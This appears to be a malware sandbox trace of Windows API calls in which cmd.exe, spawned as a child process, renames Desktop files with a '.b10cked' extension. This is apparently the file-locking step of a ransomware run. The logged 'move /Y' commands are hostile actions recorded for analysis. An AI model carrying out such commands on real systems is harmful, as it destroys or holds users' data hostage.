FreeEnvironmentStringsW (penv=0x410178) returned 1 [0220.189] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e75c | out: phkResult=0x20e75c*=0x40) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0xa0, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x1, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0x1, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x0, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x40, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x40, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0x40, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegCloseKey (hKey=0x40) returned 0x0 [0220.190] 
RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e75c | out: phkResult=0x20e75c*=0x40) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0x40, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x1, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0x1, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x0, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x9, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x4, lpData=0x20e768*=0x9, lpcbData=0x20e760*=0x4) returned 0x0 [0220.190] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e764, lpData=0x20e768, lpcbData=0x20e760*=0x1000 | out: lpType=0x20e764*=0x0, lpData=0x20e768*=0x9, lpcbData=0x20e760*=0x1000) returned 0x2 [0220.190] RegCloseKey (hKey=0x40) returned 0x0 [0220.190] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.190] srand 
(_Seed=0x5b8863b6) [0220.190] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked\"" [0220.190] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG\" \"C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked\"" [0220.191] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.191] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4118d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.191] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.191] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.191] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.191] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.191] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.191] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.191] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.191] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.191] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.191] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.191] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.191] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.192] GetEnvironmentStringsW () returned 
0x4122c8* [0220.192] FreeEnvironmentStringsW (penv=0x4122c8) returned 1 [0220.192] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.192] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.192] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.192] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.192] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.192] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.192] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.192] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.192] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.192] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.192] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f528 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.192] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f528, lpFilePart=0x20f524 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f524*="Desktop") returned 0x18 [0220.192] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.192] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f2a4 | out: lpFindFileData=0x20f2a4) returned 0x410008 [0220.193] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.193] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f2a4 | out: lpFindFileData=0x20f2a4) returned 0x410008 [0220.193] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.193] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f2a4 | out: lpFindFileData=0x20f2a4) returned 0x410008 
[0220.193] FindClose (in: hFindFile=0x410008 | out: hFindFile=0x410008) returned 1 [0220.193] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.193] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.193] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.193] GetEnvironmentStringsW () returned 0x412ae8* [0220.194] FreeEnvironmentStringsW (penv=0x412ae8) returned 1 [0220.194] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.194] GetConsoleOutputCP () returned 0x1b5 [0220.197] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.197] GetUserDefaultLCID () returned 0x409 [0220.199] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f668, cchData=128 | out: lpLCData="0") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f668, cchData=128 | out: lpLCData="0") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f668, cchData=128 | out: lpLCData="1") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 
[0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.200] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.200] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.201] GetConsoleTitleW (in: lpConsoleTitle=0x4008d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.212] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.212] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.212] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.212] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.213] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.213] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.213] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.213] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.213] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.213] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.213] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.216] GetConsoleTitleW (in: lpConsoleTitle=0x20f360, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.216] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.216] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.216] _wcsicmp (_String1="move", 
_String2="DEL") returned 9 [0220.216] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.216] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.216] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.216] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.216] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.216] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.216] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.216] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.216] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.216] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.216] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.216] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.216] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.216] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.216] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.216] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.216] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.216] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.216] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.217] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.217] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.217] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.217] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.217] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.217] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.217] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.217] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.217] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.217] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.217] _wcsicmp 
(_String1="move", _String2="DPATH") returned 9 [0220.217] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.217] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.218] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.218] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.218] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f11c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f114, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f114*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp 
(_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.219] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.219] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0220.220] _wcsicmp (_String1="BCUGG-~1.PNG", _String2=".") returned 52 [0220.220] _wcsicmp (_String1="BCUGG-~1.PNG", _String2="..") returned 52 [0220.220] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-~1.png")) returned 0x20 [0220.375] 
GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x411d50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.375] SetErrorMode (uMode=0x0) returned 0x0 [0220.375] SetErrorMode (uMode=0x1) returned 0x0 [0220.375] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", nBufferLength=0x104, lpBuffer=0x20eaa4, lpFilePart=0x20ea8c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", lpFilePart=0x20ea8c*="BCUGG-~1.PNG") returned 0x25 [0220.375] SetErrorMode (uMode=0x0) returned 0x1 [0220.375] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.375] _wcsicmp (_String1="BCUGG-~1.PNG", _String2=".") returned 52 [0220.375] _wcsicmp (_String1="BCUGG-~1.PNG", _String2="..") returned 52 [0220.375] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-~1.png")) returned 0x20 [0220.376] SetErrorMode (uMode=0x0) returned 0x0 [0220.376] SetErrorMode (uMode=0x1) returned 0x0 [0220.376] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", nBufferLength=0x104, lpBuffer=0x20ef20, lpFilePart=0x20ecb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", lpFilePart=0x20ecb8*="BCUGG-~1.PNG") returned 0x25 [0220.376] SetErrorMode (uMode=0x0) returned 0x1 [0220.376] SetErrorMode (uMode=0x0) returned 0x0 [0220.376] SetErrorMode (uMode=0x1) returned 0x0 [0220.376] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked", nBufferLength=0x104, lpBuffer=0x20f128, lpFilePart=0x20ecb8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked", lpFilePart=0x20ecb8*="BcUgG-6ytRMwdapH.png.b10cked") returned 0x35 [0220.376] SetErrorMode (uMode=0x0) returned 0x1 [0220.376] SetLastError (dwErrCode=0x0) [0220.376] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked" (normalized: 
"c:\\users\\eebsym5\\desktop\\bcugg-6ytrmwdaph.png.b10cked")) returned 0xffffffff [0220.376] GetLastError () returned 0x2 [0220.376] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x20e634, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20e634) returned 0x400f20 [0220.376] FindNextFileW (in: hFindFile=0x400f20, lpFindFileData=0x20e634 | out: lpFindFileData=0x20e634) returned 0 [0220.377] GetLastError () returned 0x12 [0220.377] FindClose (in: hFindFile=0x400f20 | out: hFindFile=0x400f20) returned 1 [0220.378] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BCUGG-~1.PNG", fInfoLevelId=0x1, lpFindFileData=0x411af0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x411af0) returned 0x400f20 [0220.378] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked", nBufferLength=0x104, lpBuffer=0x20e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked", lpFilePart=0x0) returned 0x35 [0220.378] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png", nBufferLength=0x104, lpBuffer=0x20e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png", lpFilePart=0x0) returned 0x2d [0220.378] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-6ytrmwdaph.png")) returned 0x20 [0220.378] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-6ytrmwdaph.png"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\BcUgG-6ytRMwdapH.png.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\bcugg-6ytrmwdaph.png.b10cked"), dwFlags=0x3) returned 1 [0220.379] FindClose (in: hFindFile=0x400f20 | out: hFindFile=0x400f20) returned 1 [0220.379] _vsnwprintf (in: _Buffer=0x4a1e5040, 
_BufferCount=0x103, _Format="%9d", _ArgList=0x20e880 | out: _Buffer=" 1") returned 9 [0220.380] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.380] GetFileType (hFile=0x7) returned 0x2 [0220.380] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0220.380] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20e80c | out: lpMode=0x20e80c) returned 1 [0220.380] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.380] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20e840 | out: lpConsoleScreenBufferInfo=0x20e840) returned 1 [0220.380] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0220.381] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x20e880 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0220.381] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20e864, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x20e864*=0x1a) returned 1 [0220.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.381] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.381] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.381] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.381] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.381] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.382] SetConsoleInputExeNameW () returned 0x1 [0220.382] GetConsoleOutputCP () returned 0x1b5 [0220.382] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.382] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.382] exit (_Code=0) Process: id = "575" image_name = "cmd.exe" filename = 
"c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16860" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32914 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32915 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32916 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32917 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 32918 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" 